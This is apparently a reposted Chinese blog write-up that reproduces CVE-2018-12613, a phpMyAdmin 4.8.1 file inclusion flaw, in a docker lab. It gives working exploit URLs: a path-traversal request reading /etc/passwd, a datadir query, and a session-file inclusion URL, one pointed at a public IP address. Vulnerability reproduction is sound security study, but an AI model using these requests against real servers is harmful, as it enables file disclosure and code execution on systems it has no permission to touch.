phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现
生活随笔
收集整理的這篇文章主要介紹了
phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
漏洞描述
? 攻擊者利用發(fā)現(xiàn)在服務(wù)器上包含(查看和潛在執(zhí)行)文件的漏洞。該漏洞來自一部分代碼,其中頁面在phpMyAdmin中被重定向和加載,以及對白名單頁面進行不正確的測試。 攻擊者必須經(jīng)過身份驗證,但在這些情況下除外:
- $ cfg [‘AllowArbitraryServer’] = true:攻擊者可以指定他/她已經(jīng)控制的任何主機,并在phpMyAdmin上執(zhí)行任意代碼;
- $ cfg [‘ServerDefault’] = 0:這會繞過登錄并在沒有任何身份驗證的情況下運行易受攻擊的代碼。
漏洞影響范圍
? phpMyAdmin 4.8.0和4.8.1
啟動靶場
docker-compose up -d執(zhí)行URL
http://127.0.0.1:8080/index.php?target=db_sql.php?/../../../../../../../../../etc/passwd漏洞存在
在SQL下執(zhí)行以下命令查看數(shù)據(jù)庫位置
show global variables like "%datadir%"查看sessionid后拼接并包含session
http://119.91.217.168:8080/index.php?target=db_sql.php?/../../../../../../../../tmp/sess_0c6795deaf15278c005fe2bc8b6114eb總結(jié)
以上是生活随笔為你收集整理的phpmyadmin 4.8.1 Remote File Inclusion(CVE-2018-12613)远程文件包含漏洞复现的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 远程控制漏洞CNVD-2022-1027
- 下一篇: kali Linux/centos7 L